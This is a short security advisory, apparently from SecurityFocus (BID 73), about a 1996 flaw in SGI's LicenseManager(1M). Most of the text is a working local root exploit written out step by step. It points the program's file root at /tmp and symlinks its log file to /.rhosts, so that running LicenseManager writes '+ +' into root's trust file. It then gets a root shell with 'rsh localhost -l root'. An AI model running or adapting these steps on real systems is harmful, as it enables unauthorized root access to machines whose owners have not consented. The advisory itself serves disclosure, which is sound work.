source: https://www.securityfocus.com/bid/73/info
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access.
% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &
Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.
% cat /.rhosts
Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
% rsh localhost -l root
#